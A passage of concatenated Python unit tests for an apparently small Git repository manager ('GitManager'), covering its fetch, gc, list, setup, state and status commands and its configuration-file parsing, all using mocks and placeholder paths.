'/path/to/clone')
# create a command instance
line = format.TerminalLine()
cmd = fetch.Fetch(line, [repo])
# if the local repository does not exist, we
implementation_LocalRepository.return_value.exists.return_value = False
self.assertFalse(cmd.run(repo))
implementation_LocalRepository.return_value.fetch.assert_not_called()
# reset the mock
implementation_LocalRepository.reset_mock()
# if the local repository does exist, it should have been fetched
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.fetch.return_value = True
self.assertTrue(cmd.run(repo))
implementation_LocalRepository.return_value.fetch.assert_called_with()
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import gc
from GitManager.repo import description
from GitManager.utils import format
class TestGC(unittest.TestCase):
""" Tests that the fetch command works properly """
@unittest.mock.patch(
'GitManager.repo.implementation.LocalRepository')
def test_run(self,
implementation_LocalRepository: unittest.mock.Mock):
# create a repository
repo = description.RepositoryDescription('/path/to/source',
'/path/to/clone')
# create a command instance
line = format.TerminalLine()
cmd = gc.GC(line, [repo])
# if the local repository does not exist, we do nothing
implementation_LocalRepository.return_value.exists.return_value = False
self.assertFalse(cmd.run(repo))
implementation_LocalRepository.return_value.gc.assert_not_called()
# reset the mock
implementation_LocalRepository.reset_mock()
# if the local repository does exist, it should have been gced
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.gc.return_value = True
self.assertTrue(cmd.run(repo))
implementation_LocalRepository.return_value.gc.assert_called_with()
# reset the mock and create a new mock
implementation_LocalRepository.reset_mock()
cmd = gc.GC(line, [repo], '--aggressive')
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.gc.return_value = True
self.assertTrue(cmd.run(repo))
implementation_LocalRepository.return_value.gc.assert_called_with(
'--aggressive')
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import lister
from GitManager.repo import description
from GitManager.utils import format
class TestFetch(unittest.TestCase):
""" Tests that the lister command works properly """
@unittest.mock.patch(
'GitManager.repo.implementation.LocalRepository')
@unittest.mock.patch('builtins.print')
def test_run(self,
builtins_print: unittest.mock.Mock,
implementation_LocalRepository: unittest.mock.Mock):
# create a repository
repo = description.RepositoryDescription('/path/to/source',
'/path/to/clone')
# create a command instance
line = format.TerminalLine()
cmd = lister.LsLocal(line, [repo])
# if the local repository does not exist, we just return false
implementation_LocalRepository.return_value.exists.return_value = False
self.assertTrue(cmd.run(repo))
builtins_print.assert_not_called()
# reset the mock
builtins_print.reset_mock()
implementation_LocalRepository.reset_mock()
# if the local repository does exist, it should have been fetched
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.path = "/path/to/clone"
self.assertTrue(cmd.run(repo))
builtins_print.assert_called_with('/path/to/clone')
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import state
from GitManager.repo import description
from GitManager.utils import format
from GitManager.repo import implementation
class TestReconfigure(unittest.TestCase):
""" Tests that the reconfigure command works properly """
pass
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import setup as s
from GitManager.repo import description
from GitManager.utils import format
class TestFetch(unittest.TestCase):
""" Tests that the fetch command works properly """
@unittest.mock.patch(
'GitManager.repo.implementation.LocalRepository')
@unittest.mock.patch(
'GitManager.repo.implementation.RemoteRepository')
@unittest.mock.patch('GitManager.utils.format.TerminalLine')
def test_run(self,
format_TerminalLine: unittest.mock.Mock,
implementation_RemoteRepository: unittest.mock.Mock,
implementation_LocalRepository: unittest.mock.Mock):
# create a repository
repo = description.RepositoryDescription('/path/to/source',
'/path/to/clone')
# create a command instance
line = format.TerminalLine()
cmd = s.Setup(line, [repo])
# if we already exist, nothing should happen
implementation_LocalRepository.return_value.exists.return_value = True
self.assertTrue(cmd.run(repo))
implementation_RemoteRepository.return_value.clone.assert_not_called()
# reset the mock
format_TerminalLine.reset_mock()
implementation_LocalRepository.reset_mock()
implementation_RemoteRepository.reset_mock()
# if the local repository does not exist, it should be cloned
implementation_LocalRepository.return_value.exists.return_value = False
implementation_RemoteRepository.return_value.clone.return_value = True
self.assertTrue(cmd.run(repo))
format_TerminalLine.return_value.linebreak.assert_called_with()
implementation_RemoteRepository.return_value.clone \
.assert_called_with(repo.local)
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import state
from GitManager.repo import description
from GitManager.utils import format
from GitManager.repo import implementation
class TestState(unittest.TestCase):
""" Tests that the state command works properly """
@unittest.mock.patch(
'GitManager.repo.implementation.LocalRepository')
@unittest.mock.patch(
'builtins.print')
def test_run(self,
builtins_print: unittest.mock.Mock,
implementation_LocalRepository: unittest.mock.Mock):
# create a repository
repo = description.RepositoryDescription('/path/to/source',
'/path/to/clone')
# create a line
line = format.TerminalLine()
# and a command instance
cmd = state.State(line, [repo], "--no-update")
# if we are up-to-date, nothing should have been printed
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.remote_status \
.return_value = implementation.RemoteStatus.UP_TO_DATE
self.assertTrue(cmd.run(repo))
implementation_LocalRepository.return_value.remote_status \
.assert_called_with(False)
builtins_print.assert_not_called()
# reset the mock
implementation_LocalRepository.reset_mock()
builtins_print.reset_mock()
# create another command instance
cmd = state.State(line, [repo], "--update")
# if the local repository does not exist, we
implementation_LocalRepository.return_value.exists.return_value = False
self.assertFalse(cmd.run(repo))
# reset the mock
implementation_LocalRepository.reset_mock()
builtins_print.reset_mock()
# if we are up-to-date, nothing should have been printed
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.remote_status \
.return_value = implementation.RemoteStatus.UP_TO_DATE
self.assertTrue(cmd.run(repo))
implementation_LocalRepository.return_value.remote_status\
.assert_called_with(True)
builtins_print.assert_not_called()
# reset the mock
implementation_LocalRepository.reset_mock()
builtins_print.reset_mock()
# we need to pull
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.remote_status \
.return_value = implementation.RemoteStatus.REMOTE_NEWER
self.assertFalse(cmd.run(repo))
implementation_LocalRepository.return_value.remote_status \
.assert_called_with(True)
builtins_print.assert_called_with(
format.Format.yellow('Upstream is ahead of your branch, '
'pull required. '))
# reset the mock
implementation_LocalRepository.reset_mock()
builtins_print.reset_mock()
# we need to push
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.remote_status \
.return_value = implementation.RemoteStatus.LOCAL_NEWER
self.assertFalse(cmd.run(repo))
implementation_LocalRepository.return_value.remote_status \
.assert_called_with(True)
builtins_print.assert_called_with(
format.Format.green('Your branch is ahead of upstream, '
'push required.'))
# reset the mock
implementation_LocalRepository.reset_mock()
builtins_print.reset_mock()
# divergence
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.remote_status \
.return_value = implementation.RemoteStatus.DIVERGENCE
self.assertFalse(cmd.run(repo))
implementation_LocalRepository.return_value.remote_status \
.assert_called_with(True)
builtins_print.assert_called_with(
format.Format.red('Your branch and upstream have diverged, '
'merge or rebase required. '))
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.commands import status
from GitManager.repo import description
from GitManager.utils import format
class TestStatus(unittest.TestCase):
""" Tests that the status command works properly """
@unittest.mock.patch(
'GitManager.repo.implementation.LocalRepository')
@unittest.mock.patch('GitManager.utils.format.TerminalLine')
@unittest.mock.patch('GitManager.utils.run.GitRun')
def test_run(self,
run_gitrun: unittest.mock.Mock,
format_TerminalLine: unittest.mock.Mock,
implementation_LocalRepository: unittest.mock.Mock):
# create a repository
repo = description.RepositoryDescription('/path/to/source',
'/path/to/clone')
# create a command instance
line = format.TerminalLine()
cmd = status.Status(line, [repo])
# if the local repository does not exist, do nothing
implementation_LocalRepository.return_value.exists.return_value = False
implementation_LocalRepository.return_value.path.return_value = \
'/path/to/clone'
self.assertFalse(cmd.run(repo))
implementation_LocalRepository.exists.assert_not_called()
# reset the mock
format_TerminalLine.reset_mock()
implementation_LocalRepository.reset_mock()
run_gitrun.reset_mock()
# local repository exists, but is clean
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.path.return_value = \
'/path/to/clone'
implementation_LocalRepository.return_value.local_status.return_value \
= ''
self.assertTrue(cmd.run(repo))
run_gitrun.assert_not_called()
# reset the mock
format_TerminalLine.reset_mock()
implementation_LocalRepository.reset_mock()
run_gitrun.reset_mock()
# local repository exists, but is not clean
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.path = \
'/path/to/clone'
implementation_LocalRepository.return_value.local_status.return_value \
= 'M some/file'
self.assertFalse(cmd.run(repo))
format_TerminalLine.return_value.linebreak.assert_called_with()
run_gitrun.assert_called_with('status', cwd='/path/to/clone',
pipe_stdout=True)
run_gitrun.return_value.wait.assert_called_with()
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.config import file, line
class TestFile(unittest.TestCase):
""" Tests that File() can be correctly read and parsed """
def test_read(self):
""" Tests that the locals are yielded properly """
# read the lines from the configuration file
fn = file.File("/path/to/config")
fake_lines = "\n".join([
"# Top level line with a comment",
" hello world ",
"> something ",
" hello world ",
">> sub ",
" hello world ",
"> else ",
" hello world"
]).encode("utf-8")
with unittest.mock.patch('builtins.open',
new_callable=unittest.mock.mock_open(
read_data=fake_lines)) \
as _:
# read all the lines
fn.read()
expected = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'something', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'else', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' ')
]
for (actual, intended) in zip(fn.lines, expected):
self.assertEqual(actual, intended, "line parsed properly")
@unittest.mock.patch('builtins.open')
def test_write(self, builtins_open: unittest.mock.Mock):
""" Tests that writing lines works properly """
# create a config file instance
fn = file.File("/path/to/config")
# setup the lines properly
fn.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'something', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'else', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' ')
]
fake_lines = [
"# Top level line with a comment",
" hello world ",
"> something ",
" hello world ",
">> sub ",
" hello world ",
"> else ",
" hello world "
]
# do the writing
fn.write()
# check that each of the lines has been written
for l in fake_lines:
builtins_open.return_value.__enter__.return_value.write. \
assert_any_call("{}\n".format(l))
@unittest.mock.patch('os.path.isfile', return_value=False)
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_find(self, os_path_expanduser: unittest.mock.Mock,
os_path_isfile: unittest.mock.Mock):
""" Tests that the find() method works properly """
# no environment variables
with unittest.mock.patch.dict('os.environ', {}) as _:
# take no values
self.assertEqual(file.File.find(), None,
"No file is found if none exists. ")
os_path_isfile.assert_any_call(
'/path/to/home/.config/.gitmanager/config')
os_path_isfile.assert_any_call('/path/to/home/.gitmanager')
# take the first alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [True, False]
self.assertEqual(file.File.find(),
'/path/to/home/.config/.gitmanager/config',
"Finding the first file if it exists")
# take the second alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [False, True]
self.assertEqual(file.File.find(),
'/path/to/home/.gitmanager',
"Finding the second file if it exists")
# reset the mock completly
os_path_isfile.reset_mock()
os_path_isfile.side_effect = None
os_path_isfile.return_value = False
# only $GIT_MANAGER_CONFIG
with unittest.mock.patch.dict('os.environ', {
"GIT_MANAGER_CONFIG": "/path/to/config.file"
}) as _:
# take no values
self.assertEqual(file.File.find(), None,
"No file is found if none exists. ")
os_path_isfile.assert_any_call('/path/to/config.file')
os_path_isfile.assert_any_call(
'/path/to/home/.config/.gitmanager/config')
os_path_isfile.assert_any_call('/path/to/home/.gitmanager')
# take the first alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [True, False, False]
self.assertEqual(file.File.find(),
'/path/to/config.file',
"Finding the first file if it exists")
# take the second alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [False, True, False]
self.assertEqual(file.File.find(),
'/path/to/home/.config/.gitmanager/config',
"Finding the second file if it exists")
# take the third alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [False, False, True]
self.assertEqual(file.File.find(),
'/path/to/home/.gitmanager',
"Finding the third file if it exists")
os_path_isfile.reset_mock()
os_path_isfile.side_effect = None
os_path_isfile.return_value = False
# only XDG_CONFIG_HOME
with unittest.mock.patch.dict('os.environ', {
"XDG_CONFIG_HOME": "/path/to/xdg"
}) as _:
# take no values
self.assertEqual(file.File.find(), None,
"No file is found if none exists. ")
os_path_isfile.assert_any_call(
'/path/to/xdg/.gitmanager/config')
os_path_isfile.assert_any_call('/path/to/home/.gitmanager')
# take the first alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [True, False]
self.assertEqual(file.File.find(),
'/path/to/xdg/.gitmanager/config',
"Finding the first file if it exists")
# take the second alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [False, True]
self.assertEqual(file.File.find(),
'/path/to/home/.gitmanager',
"Finding the second file if it exists")
# reset the mock completely
os_path_isfile.reset_mock()
os_path_isfile.side_effect = None
os_path_isfile.return_value = False
# both
with unittest.mock.patch.dict('os.environ', {
"GIT_MANAGER_CONFIG": "/path/to/config.file",
"XDG_CONFIG_HOME": "/path/to/xdg"
}) as _:
# take no values
self.assertEqual(file.File.find(), None,
"No file is found if none exists. ")
os_path_isfile.assert_any_call('/path/to/config.file')
os_path_isfile.assert_any_call(
'/path/to/xdg/.gitmanager/config')
os_path_isfile.assert_any_call('/path/to/home/.gitmanager')
# take the first alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [True, False, False]
self.assertEqual(file.File.find(),
'/path/to/config.file',
"Finding the first file if it exists")
# take the second alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [False, True, False]
self.assertEqual(file.File.find(),
'/path/to/xdg/.gitmanager/config',
"Finding the second file if it exists")
# take the third alternative
os_path_isfile.reset_mock()
os_path_isfile.side_effect = [False, False, True]
self.assertEqual(file.File.find(),
'/path/to/home/.gitmanager',
"Finding the third file if it exists")
--- FILE SEPARATOR ---
import unittest
from GitManager.config import line
class TestConfigLine(unittest.TestCase):
""" Tests that ConfigLines can be correctly parsed"""
def test_abstract(self):
""" Tests that the write() method is abstract """
# because it is abstract, we can not raise it
with self.assertRaises(NotImplementedError):
line.ConfigLine.write(None)
def test_parse_RootLine(self):
""" Tests that RootLines can be properly parsed """
self.assertEqual(line.ConfigLine.parse('##root'),
line.RootLine('', '', 'root', ''),
'parsing root directive')
self.assertEqual(line.ConfigLine.parse('\t ## /folder '),
line.RootLine('\t ', ' ', '/folder', ' '),
'parsing comments with tabs')
def test_parse_NOPLine(self):
""" Tests that NOPLines can be correctly parsed """
self.assertEqual(line.ConfigLine.parse('# hello world'),
line.NOPLine('# hello world'), 'parsing comments')
self.assertEqual(line.ConfigLine.parse('# >>> a b'),
line.NOPLine('# >>> a b'),
'parsing commented out RepoLine')
self.assertEqual(line.ConfigLine.parse('\t # hello world'),
line.NOPLine('\t # hello world'),
'parsing comments with spaces')
self.assertEqual(line.ConfigLine.parse(''), line.NOPLine(''),
'parsing empty line')
self.assertEqual(line.ConfigLine.parse('\t\n '),
line.NOPLine('\t\n '),
'parsing line with only spaces')
def test_parse_BaseLine(self):
""" Tests that BaseLines can be correctly parsed """
self.assertEqual(line.ConfigLine.parse('> hello'),
line.BaseLine('', 1, ' ', 'hello', ''),
'parsing minimal BaseLine')
self.assertEqual(line.ConfigLine.parse('>>>> hello'),
line.BaseLine('', 4, ' ', 'hello', ''),
'parsing minimal BaseLine with more indent')
self.assertEqual(line.ConfigLine.parse('> hello '),
line.BaseLine('', 1, ' ', 'hello', ' '),
'parsing complete BaseLine with minimal spacing')
self.assertEqual(line.ConfigLine.parse('>>>> hello '),
line.BaseLine('', 4, ' ', 'hello', ' '),
'parsing complete BaseLine with minimal spacing '
'and more indent')
self.assertEqual(line.ConfigLine.parse('\t>>>>\t\thello\t '),
line.BaseLine('\t', 4, '\t\t', 'hello', '\t '),
'parsing complete BaseLine with spacing '
'and more indent')
def test_parse_RepoLine(self):
""" Tests that RepoLines can be correctly parsed """
self.assertEqual(line.ConfigLine.parse('a'),
line.RepoLine('', 'a', '', '', ''),
'parsing minimal RepoLine')
self.assertEqual(line.ConfigLine.parse('a b'),
line.RepoLine('', 'a', ' ', 'b', ''),
'parsing minimal but complete RepoLine')
self.assertEqual(line.ConfigLine.parse('\ta\t\tb\t\t\t'),
line.RepoLine('\t', 'a', '\t\t', 'b', '\t\t\t'),
'parsing RepoLine with spacing')
def test_parse_fail(self):
""" Tests that invalid lines can not be parsed """
# three items can not be parsed
with self.assertRaises(ValueError):
line.ConfigLine.parse("a b c")
# Comments at the end of the line are not allowed
with self.assertRaises(ValueError):
line.ConfigLine.parse("hello world #things")
with self.assertRaises(ValueError):
line.ConfigLine.parse(">> hello world #things")
class TestRootLine(unittest.TestCase):
""" Tests that RootLine class works properly """
def test_eq(self):
""" Checks that equality between RootLines works properly """
self.assertEqual(line.RootLine('', '', '/root', ''),
line.RootLine('', '', '/root', ''),
'equality of root lines')
self.assertEqual(line.RootLine('\t ', '', 'folder', ''),
line.RootLine('\t ', '', 'folder', ''),
'equality of root lines')
def test_indent(self):
""" Tests that the indent function works properly """
self.assertEqual(line.RootLine('\t ', '', 'folder', '').indent,
'\t ', 'indent of root line')
self.assertEqual(line.RootLine('', '', '/root', '').indent,
'', 'indent of root line')
def test_write(self):
""" Tests that writing NOPLines works properly """
self.assertEqual(line.RootLine('', '', '/root', '').write(),
'##/root', 'writing root line')
self.assertEqual(line.RootLine('\t ', '', 'folder', '').write(),
'\t ##folder', 'writing root line')
def test_root(self):
""" Tests that the root attribute is read correctly """
self.assertEqual(line.RootLine('', '', '/root', '').root,
'/root', 'root of root line')
self.assertEqual(line.RootLine('\t ', '', 'folder', '').root,
'folder', 'root of root line')
class TestNOPLine(unittest.TestCase):
""" Tests that NOPLine class works properly """
def test_eq(self):
""" Checks that equality between NOPLines works properly """
self.assertEqual(line.NOPLine('# hello world'),
line.NOPLine('# hello world'),
'equality of comments')
self.assertEqual(line.NOPLine('# >>> a b'),
line.NOPLine('# >>> a b'),
'equality of commented out RepoLines')
self.assertEqual(line.NOPLine('\t # hello world'),
line.NOPLine('\t # hello world'),
'equality comments with spaces')
self.assertEqual(line.NOPLine(''), line.NOPLine(''),
'equality of empty lines')
self.assertEqual(line.NOPLine('\t\n '),
line.NOPLine('\t\n '),
'equality of lines with only spaces')
self.assertNotEqual(line.NOPLine('\t\n '),
line.NOPLine('\t\n '),
'inequality of two different NOPLines')
self.assertNotEqual(line.NOPLine('\t\n '),
line.ConfigLine(''),
'inequality between two different objects')
def test_indent(self):
""" Tests that the indent function works properly """
self.assertEqual(line.NOPLine('# hello world').indent,
'', 'indent of comment line')
self.assertEqual(line.NOPLine('# >>> a b').indent,
'', 'content of commented out RepoLine')
self.assertEqual(line.NOPLine('\t # hello world').indent,
'',
'indent of comments with spaces')
self.assertEqual(line.NOPLine('').indent, '',
'indent of empty line')
self.assertEqual(line.NOPLine('\t\n ').indent, '',
'indent of line with only spaces')
def test_write(self):
""" Tests that writing NOPLines works properly """
self.assertEqual(line.NOPLine('# hello world').write(),
'# hello world', 'writing comment line')
self.assertEqual(line.NOPLine('# >>> a b').write(),
'# >>> a b', 'writing commented out RepoLine')
self.assertEqual(line.NOPLine('\t # hello world').write(),
'\t # hello world',
'writing comments with spaces')
self.assertEqual(line.NOPLine('').write(), '', 'writing empty line')
self.assertEqual(line.NOPLine('\t\n ').write(), '\t\n ',
'writing line with only spaces')
def test_content(self):
""" Tests that the content attribute is read correctly """
self.assertEqual(line.NOPLine('# hello world').content,
'# hello world', 'content of comment line')
self.assertEqual(line.NOPLine('# >>> a b').content,
'# >>> a b', 'content of commented out RepoLine')
self.assertEqual(line.NOPLine('\t # hello world').content,
'\t # hello world',
'content of comments with spaces')
self.assertEqual(line.NOPLine('').content, '',
'content of empty line')
self.assertEqual(line.NOPLine('\t\n ').content, '\t\n ',
'content of line with only spaces')
class TestBaseLine(unittest.TestCase):
""" Tests that BaseLine class works properly """
def test_eq(self):
""" Tests that equality between BaseLines works properly """
self.assertEqual(line.BaseLine('', 1, ' ', 'hello', ''),
line.BaseLine('', 1, ' ', 'hello', ''),
'equality between minimal BaseLines')
self.assertEqual(line.BaseLine('', 4, ' ', 'hello', ''),
line.BaseLine('', 4, ' ', 'hello', ''),
'equality between minimal BaseLines with more indent')
self.assertEqual(line.BaseLine('', 1, ' ', 'hello', ' '),
line.BaseLine('', 1, ' ', 'hello', ' '),
'equality between complete BaseLines with minimal '
'spacing')
self.assertEqual(line.BaseLine('', 4, ' ', 'hello', ' '),
line.BaseLine('', 4, ' ', 'hello', ' '),
'equality between complete BaseLines with minimal '
'spacing and more indent')
self.assertEqual(line.BaseLine('\t', 4, '\t\t', 'hello', '\t '),
line.BaseLine('\t', 4, '\t\t', 'hello', '\t '),
'equality between complete BaseLines with spacing '
'and more indent')
self.assertNotEqual(line.BaseLine('', 1, ' ', 'hello', ''),
line.BaseLine('', 4, ' ', 'hello', ''),
'inequality between different BaseLines')
self.assertNotEqual(line.BaseLine('', 1, ' ', 'hello', ''),
line.ConfigLine(''),
'inequality between BaseLine and instance of '
'other class')
def test_indent(self):
""" Tests that the indent function works properly """
self.assertEqual(line.BaseLine('', 1, ' ', 'hello', '').indent,
'',
'indent of minimal BaseLine')
self.assertEqual(line.BaseLine('', 4, ' ', 'hello', '').indent,
'',
'indent of minimal BaseLines with more '
'indent')
self.assertEqual(line.BaseLine('', 1, ' ', 'hello', ' ').indent,
'',
'indent of complete BaseLine with minimal spacing')
self.assertEqual(line.BaseLine('', 4, ' ', 'hello', ' ').indent,
'',
'indent of complete BaseLine with minimal '
'spacing and more indent')
self.assertEqual(line.BaseLine('\t', 4, '\t\t', 'hello', '\t ').indent,
'\t',
'indent of complete BaseLines with spacing '
'and more indent')
def test_write(self):
""" Tests that writing BaseLines works properly """
self.assertEqual(line.BaseLine('', 1, ' ', 'hello', '').write(),
'> hello', 'writing minimal BaseLine')
self.assertEqual(
line.BaseLine('', 4, ' ', 'hello', '').write(),
'>>>> hello',
'writing minimal BaseLine with more indent')
self.assertEqual(line.BaseLine('', 1, ' ', 'hello', ' ').write(),
'> hello ',
'writing complete BaseLine with minimal spacing')
self.assertEqual(line.BaseLine('', 4, ' ', 'hello', ' ').write(),
'>>>> hello ',
'writing complete BaseLine with minimal spacing '
'and more indent')
self.assertEqual(
line.BaseLine('\t', 4, '\t\t', 'hello', '\t ').write(),
'\t>>>>\t\thello\t ',
'writing complete BaseLine with spacing '
'and more indent')
def test_depth(self):
""" Tests that the depth property is read correctly """
self.assertEqual(line.BaseLine('', 1, ' ', 'hello', '').depth,
1, 'reading depth of minimal BaseLine')
self.assertEqual(
line.BaseLine('', 4, ' ', 'hello', '').depth,
4,
'reading depth of minimal BaseLine with more indent')
self.assertEqual(line.BaseLine('', 1, ' ', 'hello', ' ').depth,
1,
'reading depth of complete BaseLine with minimal '
'spacing')
self.assertEqual(line.BaseLine('', 4, ' ', 'hello', ' ').depth,
4,
'reading depth of complete BaseLine with minimal '
'spacing and more indent')
self.assertEqual(line.BaseLine('\t', 4, '\t\t', 'hello', '\t ').depth,
4,
'reading depth of complete BaseLine with spacing '
'and more indent')
def test_path(self):
""" Tests that the path property is read correctly """
self.assertEqual(line.BaseLine('', 1, ' ', 'hello', '').path,
'hello', 'reading path of minimal BaseLine')
self.assertEqual(
line.BaseLine('', 4, ' ', 'hello', '').path,
'hello',
'reading path of minimal BaseLine with more indent')
self.assertEqual(line.BaseLine('', 1, ' ', 'hello', ' ').path,
'hello',
'reading path of complete BaseLine with minimal '
'spacing')
self.assertEqual(line.BaseLine('', 4, ' ', 'hello', ' ').path,
'hello',
'reading path of complete BaseLine with minimal '
'spacing and more indent')
self.assertEqual(line.BaseLine('\t', 4, '\t\t', 'hello', '\t ').path,
'hello',
'reading path of complete BaseLine with spacing '
'and more indent')
class TestRepoLine(unittest.TestCase):
""" Tests that RepoLine class works properly """
def test_eq(self):
""" Tests that equality between repo lines works properly """
self.assertEqual(line.RepoLine('', 'a', '', '', ''),
line.RepoLine('', 'a', '', '', ''),
'equality between minimal RepoLines')
self.assertEqual(line.RepoLine('', 'a', ' ', 'b', ''),
line.RepoLine('', 'a', ' ', 'b', ''),
'equality between minimal but complete RepoLines')
self.assertEqual(line.RepoLine('\t', 'a', '\t\t', 'b', '\t\t\t'),
line.RepoLine('\t', 'a', '\t\t', 'b', '\t\t\t'),
'equality RepoLines with spacing')
self.assertNotEqual(line.RepoLine('', 'a', '', '', ''),
line.RepoLine(' ', 'a', '', '', ''),
'inequality between different RepoLines')
self.assertNotEqual(line.RepoLine('', 'a', '', '', ''),
line.ConfigLine(' '),
'inequality between RepoLine and instance of a '
'different class')
def test_indent(self):
""" Tests that the indent function works properly """
self.assertEqual(line.RepoLine('', 'a', '', '', '').indent,
'',
'indent of minimal RepoLine')
self.assertEqual(line.RepoLine('', 'a', ' ', 'b', '').indent,
'',
'indent of minimal but complete RepoLine')
self.assertEqual(line.RepoLine('\t', 'a', '\t\t', 'b',
'\t\t\t').indent,
'\t',
'indent of RepoLine with spacing')
def test_write(self):
""" Tests that writing RepoLines works properly """
self.assertEqual(line.RepoLine('', 'a', '', '', '').write(),
'a',
'writing minimal RepoLine')
self.assertEqual(line.RepoLine('', 'a', ' ', 'b', '').write(),
'a b',
'writing minimal but complete RepoLine')
self.assertEqual(
line.RepoLine('\t', 'a', '\t\t', 'b', '\t\t\t').write(),
'\ta\t\tb\t\t\t',
'writing RepoLine with spacing')
def test_url(self):
""" Tests that the url property is read properly """
self.assertEqual(line.RepoLine('', 'a', '', '', '').url,
'a',
'getting url of minimal RepoLine')
self.assertEqual(line.RepoLine('', 'a', ' ', 'b', '').url,
'a',
'getting url of minimal but complete RepoLine')
self.assertEqual(
line.RepoLine('\t', 'a', '\t\t', 'b', '\t\t\t').url,
'a',
'getting url of RepoLine with spacing')
def test_path(self):
""" Tests that the path property is read properly """
self.assertEqual(line.RepoLine('', 'a', '', '', '').path,
'',
'getting path of minimal RepoLine')
self.assertEqual(line.RepoLine('', 'a', ' ', 'b', '').path,
'b',
'getting path of minimal but complete RepoLine')
self.assertEqual(
line.RepoLine('\t', 'a', '\t\t', 'b', '\t\t\t').path,
'b',
'getting path of RepoLine with spacing')
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.config import tree, line
from GitManager.repo import description as d
from GitManager.repo.implementation import LocalRepository
class TestTree(unittest.TestCase):
""" Tests that Tree() can be correctly parsed and changed """
def test_lines(self):
""" Test that the lines are correctly initialised """
t = tree.Tree()
self.assertEqual(t.lines, [], "by default, lines are empty")
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_root(self, os_path_expanduser: unittest.mock.Mock):
""" Test that the lines are correctly initialised """
t = tree.Tree()
self.assertEqual(t.root, '/path/to/home', "by default root is /home")
t = tree.Tree()
t.lines = [line.RootLine('', '', 'root', '')]
self.assertEqual(t.root, '/path/to/home/root', "setting relative root")
t = tree.Tree()
t.lines = [line.RootLine('', '', '/opt/root', '')]
self.assertEqual(t.root, '/opt/root', "setting absolute root")
t = tree.Tree()
t.lines = [line.RootLine('', '', '/opt/root', ''),
line.RootLine('', '', '/opt/root/second', '')]
self.assertEqual(t.root, '/opt/root',
"setting root ignores first root")
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_descriptions(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that the descriptions are yielded properly """
# create a tree instance
t = tree.Tree()
# setup the lines properly
t.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'something', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'else', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
]
# the intended results
results = [
d.RepositoryDescription(source='hello',
path='/path/to/home/world'),
d.BaseDescription('/path/to/home/something'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/world'),
d.BaseDescription('/path/to/home/something/sub'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/sub/world'),
d.BaseDescription('/path/to/home/else'),
d.RepositoryDescription(source='hello',
path='/path/to/home/else/world')
]
# check that the yielding works properly
for (i, (actual, intended)) in enumerate(zip(t.descriptions, results)):
self.assertEqual(actual,
(i + 1, intended), "Lines parsed properly")
# reset the lines to something that should thrown an error
t.lines = [
line.BaseLine('', 2, ' ', 'something', '')
]
# we are skipping a base level -- this should thrown an error
with self.assertRaises(Exception):
list(t.repositories)
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_repositories(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that the repositories are yielded properly """
# create a tree instance
t = tree.Tree()
# setup the lines properly
t.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'something', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
